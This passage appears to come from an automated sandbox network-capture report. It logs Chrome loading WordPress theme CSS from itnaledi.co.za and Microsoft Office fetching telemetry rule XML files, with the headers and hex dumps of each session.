                                                                                                                      Data Ascii: dffe\u200d\ud83e\udef2\ud83c[\udffb-\udffd\udfff]|\ud83e\udef1\ud83c\udfff\u200d\ud83e\udef2\ud83c[\udffb-\udffe]|\ud83d\udc68\u200d\u2764\ufe0f\u200d\ud83d\udc68|\ud83d\udc69\u200d\u2764\ufe0f\u200d\ud83d[\udc68\udc69]|\ud83e\uddd1\u200d\ud83e\udd1d\u200
                                                                                                                      2024-12-03 07:55:15 UTC2722INData Raw: 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 61 3d 63 2e 64 6f 63 75 6d 65 6e 74 2c 74 3d 21 31 2c 72 3d 30 2c 6f 3d 30 3c 63 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 54 72 69 64 65 6e 74 2f 37 2e 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 72 65 74 75 72 6e 21 61 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 68 61 73 46 65 61 74 75 72 65 7c 7c 61 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 68 61 73 46 65 61 74 75 72 65 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 53 56 47 31 31 2f 66 65 61 74 75 72 65 23 49 6d 61 67 65 22 2c 22 31 2e 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 69 66 28 21 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 63 2e 74 77 65 6d 6f 6a
                                                                                                                      Data Ascii: MutationObserver,a=c.document,t=!1,r=0,o=0<c.navigator.userAgent.indexOf("Trident/7.0");function i(){return!a.implementation.hasFeature||a.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1")}function s(){if(!t){if(void 0===c.twemoj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      77192.168.2.44983513.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:15 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:15 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:15 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 415
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                      x-ms-request-id: ab991284-101e-005a-2ab3-42882b000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075515Z-174f784596886s2bhC1EWR743w00000015sg000000001ef1
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:15 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      78192.168.2.449839196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:15 UTC614OUTGET /wp-content/themes/salient/css/build/elements/element-testimonial.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:16 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "1881-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 6273
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:16 UTC6273INData Raw: 2e 63 6f 6c 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 7d 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 6f 70 61 63 69 74 79 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 31 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 6a 73 29 20 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 7b 6f 70 61 63 69 74 79 3a 31 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 74 65 73 74 69 6d 6f 6e 69 61 6c 5f 73 6c 69 64 65 72 3a 6e 6f 74 28 5b 64 61 74 61 2d 73 74 79 6c 65 2a 3d 6d 75 6c 74 69 70 6c 65 5f 76 69 73 69 62 6c 65 5d 29 20 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f
                                                                                                                      Data Ascii: .col.testimonial_slider{float:none}.testimonial_slider{float:none;opacity:0;margin-bottom:21px}html:not(.js) .testimonial_slider{opacity:1;height:auto}.testimonial_slider:not([data-style*=multiple_visible]) blockquote{padding-left:0;text-align:center;colo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      79192.168.2.44984113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:15 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:16 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 419
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                      x-ms-request-id: 9318b81d-501e-0035-5bd6-43c923000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075516Z-174f7845968nxc96hC1EWRspw800000015eg0000000022sx
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:16 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      80192.168.2.44984313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:15 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:16 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 419
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                      x-ms-request-id: 5470b825-901e-0048-1e08-45b800000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075516Z-174f78459685726chC1EWRsnbg00000015s0000000002mfd
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:16 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      81192.168.2.449845196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:16 UTC610OUTGET /wp-content/themes/salient/css/build/elements/element-clients.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:16 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "12c0-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 4800
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:16 UTC4800INData Raw: 2e 63 6c 69 65 6e 74 73 2e 74 77 6f 2d 63 6f 6c 73 3e 64 69 76 7b 77 69 64 74 68 3a 34 39 2e 34 25 7d 2e 63 6c 69 65 6e 74 73 2e 74 77 6f 2d 63 6f 6c 73 2e 6e 6f 2d 63 61 72 6f 75 73 65 6c 3e 64 69 76 7b 77 69 64 74 68 3a 34 38 2e 34 25 7d 2e 63 6c 69 65 6e 74 73 2e 74 77 6f 2d 63 6f 6c 73 3e 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 2b 32 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 63 6c 69 65 6e 74 73 2e 63 61 72 6f 75 73 65 6c 2e 74 77 6f 2d 63 6f 6c 73 3e 64 69 76 7b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 63 6c 69 65 6e 74 73 2e 74 68 72 65 65 2d 63 6f 6c 73 3e 64 69 76 7b 77 69 64 74 68 3a 33 32 2e 36 25 7d 2e 63 6c 69 65 6e 74 73 2e 74 68 72 65 65 2d 63 6f 6c 73 2e 6e 6f 2d 63 61 72 6f 75 73 65 6c 3e 64 69 76 7b 77 69 64 74 68
                                                                                                                      Data Ascii: .clients.two-cols>div{width:49.4%}.clients.two-cols.no-carousel>div{width:48.4%}.clients.two-cols>div:nth-child(2n+2){margin-right:0}.clients.carousel.two-cols>div{margin:0 10px}.clients.three-cols>div{width:32.6%}.clients.three-cols.no-carousel>div{width


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      82192.168.2.44984413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:16 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:16 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 477
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                      x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075516Z-174f7845968pght8hC1EWRyvxg00000008r0000000008d1m
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:16 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      83192.168.2.449846196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:16 UTC623OUTGET /wp-content/themes/salient/css/build/elements/element-fancy-unordered-list.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:17 UTC281INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "661-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 1633
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:17 UTC1633INData Raw: 2e 6e 65 63 74 61 72 2d 66 61 6e 63 79 2d 75 6c 20 75 6c 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 38 70 78 7d 62 6f 64 79 20 2e 6e 65 63 74 61 72 2d 66 61 6e 63 79 2d 75 6c 5b 64 61 74 61 2d 6c 69 73 74 2d 69 63 6f 6e 3d 6e 6f 6e 65 5d 20 75 6c 20 6c 69 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 6e 65 63 74 61 72 2d 66 61 6e 63 79 2d 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 6e 65 63 74 61 72 2d 66 61 6e 63 79 2d 75 6c 20 75 6c 20 6c 69 20 69 2c 2e 6e 65 63 74 61 72 2d 66 61 6e 63 79 2d 75 6c 20 75 6c 20 6c 69 20 69 2e 69 63 6f 6e 2d 64 65 66 61 75 6c 74 2d 73 74 79
                                                                                                                      Data Ascii: .nectar-fancy-ul ul li{list-style:none;position:relative;padding-left:38px}body .nectar-fancy-ul[data-list-icon=none] ul li{padding-left:0;margin-bottom:0}.nectar-fancy-ul ul{margin-left:0}.nectar-fancy-ul ul li i,.nectar-fancy-ul ul li i.icon-default-sty


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      84192.168.2.449847196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:16 UTC612OUTGET /wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:17 UTC281INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:16 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "846-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 2118
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:17 UTC2118INData Raw: 2e 6e 65 63 74 61 72 2d 6d 69 6c 65 73 74 6f 6e 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 31 35 73 20 65 61 73 65 7d 2e 6e 65 63 74 61 72 2d 6d 69 6c 65 73 74 6f 6e 65 3a 6e 6f 74 28 2e 61 6e 69 6d 61 74 65 64 2d 69 6e 29 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 6e 65 63 74 61 72 2d 6d 69 6c 65 73 74 6f 6e 65 5b 64 61 74 61 2d 6d 73 2d 61 6c 69 67 6e 3d 72 69 67 68 74 5d 2c 2e 73 70 61 6e 5f 31 32 2e 72 69 67 68 74 20 2e 6e 65 63 74 61 72 2d 6d 69 6c 65 73 74 6f 6e 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 2e 6e 65 63 74 61 72 2d 6d 69 6c 65 73 74 6f 6e 65 5b 64 61 74 61 2d 6d 73 2d 61 6c 69 67 6e 3d 6c 65 66 74 5d 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e
                                                                                                                      Data Ascii: .nectar-milestone{text-align:center;transition:opacity .15s ease}.nectar-milestone:not(.animated-in){opacity:0}.nectar-milestone[data-ms-align=right],.span_12.right .nectar-milestone{text-align:right}.nectar-milestone[data-ms-align=left]{text-align:left}.


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      85192.168.2.449848196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:16 UTC606OUTGET /wp-content/themes/salient/css/build/plugins/caroufredsel.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:17 UTC282INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:17 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "26b4-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 9908
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:17 UTC7910INData Raw: 2e 63 61 72 6f 75 73 65 6c 2d 6f 75 74 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 70 78 7d 62 6f 64 79 5b 64 61 74 61 2d 61 6a 61 78 2d 74 72 61 6e 73 69 74 69 6f 6e 73 3d 74 72 75 65 5d 20 2e 72 6f 77 2e 63 61 72 6f 75 73 65 6c 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 63 61 72 6f 75 73 65 6c 2d 68 65 61 64 69 6e 67 7b 7a 2d 69 6e 64 65 78 3a 31 30 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 37 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 63 61 72 6f 75 73 65 6c 2d 68 65 61 64 69 6e 67 20 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 6c 65 74 74 65
